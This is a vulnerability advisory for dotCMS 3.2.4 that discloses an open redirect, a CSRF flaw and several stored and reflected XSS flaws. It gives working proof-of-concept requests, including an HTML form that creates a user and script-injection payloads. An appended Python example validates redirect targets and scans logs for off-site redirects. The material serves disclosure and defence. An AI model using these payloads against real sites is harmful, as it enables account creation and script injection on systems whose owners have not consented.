dotCMS 3.2.4 CSRF / XSS / Open Redirect

08 Dec 2015 | Reported by LiquidWorm | Type: packetstorm | Source: packetstormsecurity.com

dotCMS 3.2.4 Multiple Vulnerabilities - Open Redirect, CSRF, XSS

```text
dotCMS 3.2.4 Multiple Vulnerabilities


Vendor: dotCMS Software, LLC
Product web page: http://www.dotcms.com
Affected version: 3.2.4 (Enterprise)

Summary: DotCMS is the next generation of Content Management System (CMS).
Quick to deploy, open source, Java-based, open APIs, extensible and massively
scalable, dotCMS can rapidly deliver personalized, engaging multi-channel
sites, web apps, campaigns, one-pagers, intranets - all types of content
driven experiences - without calling in your developers.

Desc: The application suffers from multiple security vulnerabilities including:
Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request
Forgery (CSRF).

Tested on: Apache-Coyote/1.1


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5290
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php

Vendor: http://dotcms.com/docs/latest/change-log
https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305
https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3


19.11.2015

--


1. Open Redirect via '_EXT_LANG_redirect' GET parameter:
--------------------------------------------------------

http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia



2. CSRF Add Admin:
------------------

<html>
<body>
<form action="http://127.0.0.1/dwr/call/plaincall/UserAjax.addUser.dwr" method="POST" enctype="text/plain">
<input type="hidden" name="callCount" value="1
windowName=c0-param2
c0-scriptName=UserAjax
c0-methodName=addUser
c0-id=0
c0-param0=null:null
c0-param1=string:TEST2
c0-param2=string:AAAA2
c0-param3=string:AAA2%40bb.net
c0-param4=string:123123
batchId=3
instanceId=0
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1448026121316
scriptSessionId=hd2XkJoJcyP9lEk5N8qUe*ouv5l/mn17B5l-IA*1ZViJ6
" />
<input type="submit" value="Tutaj" />
</form>
</body>
</html>



3. Multiple Stored And Reflected XSS:
-------------------------------------

POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1
Host: 127.0.0.1

callCount=1
windowName=c0-param0
c0-scriptName=TagAjax
c0-methodName=addTag
c0-id=0
c0-param0=<script>alert(1)<%2fscript>
c0-param1=string:
c0-param2=string:48190c8c-42c4-46af-8d1a-0cd5db894797%20
batchId=2
instanceId=0
......



POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategory.dwr HTTP/1.1
Host: 127.0.0.1

callCount=1
windowName=c0-param5
c0-scriptName=CategoryAjax
c0-methodName=saveOrUpdateCategory
c0-id=0
c0-param0=boolean:true
c0-param1=null:null
c0-param2=<script>alert(2)<%2fscript>
c0-param3=string:ppp
c0-param4=string:aaa
c0-param5=string:bbb
batchId=2
instanceId=0
......



POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1
Host: 127.0.0.1

query=aaaa
offset="><script>alert(3)<%2fscript>
limit=20
sort=1
userid=admin
reindexResults=true
......



http://127.0.0.1/DotAjaxDirector/com.dotmarketing.portlets.osgi.AJAX.OSGIAJAX [jar parameter]
http://127.0.0.1/api/portlet/ES_SEARCH_PORTLET/render [URL path filename]
http://127.0.0.1/c/portal/layout [limit parameter]
http://127.0.0.1/c/portal/layout [offset parameter]
http://127.0.0.1/c/portal/layout [query parameter]
http://127.0.0.1/c/portal/layout [sort parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter]
```
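The first finding turns on the `_EXT_LANG_redirect` value being sent to the browser unchecked. The following is an added defensive example, not code from the advisory or from dotCMS: a same-origin check for such a redirect parameter (the kind of validation the vendor fix needs to apply before issuing the 302), plus a scan over constructed access-log lines that flags past requests whose redirect target would have left the site. The parameter name comes from the advisory; the log format and its lines are assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Redirect parameter named in the advisory's first finding.
REDIRECT_PARAM = "_EXT_LANG_redirect"


def is_safe_redirect(target: str) -> bool:
    """True only for a same-origin, path-absolute target such as
    '/c/portal/layout?p_l_id=1'. Expects the already URL-decoded value."""
    if not target:
        return False
    t = target.strip()
    # Backslashes and control characters let browsers reinterpret the URL
    # ('/\evil.example' is handled like '//evil.example'), so refuse them.
    if "\\" in t or any(ord(ch) < 0x20 for ch in t):
        return False
    parts = urlsplit(t)
    # Any scheme ('http:', 'javascript:') or authority ('//evil.example')
    # means the browser would leave this origin.
    if parts.scheme or parts.netloc:
        return False
    return t.startswith("/") and not t.startswith("//")


# Constructed access-log lines (not from the advisory) used as sample input.
SAMPLE_LOG = [
    '127.0.0.1 - admin [19/Nov/2015:10:00:00 +0100] "GET /c/portal/layout'
    '?p_p_id=EXT_LANG&_EXT_LANG_cmd=save&_EXT_LANG_redirect=%2Fc%2Fportal%2Flayout'
    ' HTTP/1.1" 302 -',
    '127.0.0.1 - admin [19/Nov/2015:10:00:05 +0100] "GET /c/portal/layout'
    '?p_p_id=EXT_LANG&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http%3A%2F%2Fzeroscience.mk'
    ' HTTP/1.1" 302 -',
    '127.0.0.1 - - [19/Nov/2015:10:00:09 +0100] "GET /c/portal/layout'
    '?p_p_id=EXT_LANG&p_p_action=0 HTTP/1.1" 200 1234',
]

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def find_offsite_redirects(lines):
    """Return every redirect target in the log that fails is_safe_redirect()."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query  # parse_qs decodes the values
        for value in parse_qs(query, keep_blank_values=True).get(REDIRECT_PARAM, []):
            if not is_safe_redirect(value):
                hits.append(value)
    return hits
```

Running `find_offsite_redirects(SAMPLE_LOG)` on the constructed lines returns only the off-site target; the same `is_safe_redirect()` check placed in front of the redirect itself is the mitigation.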
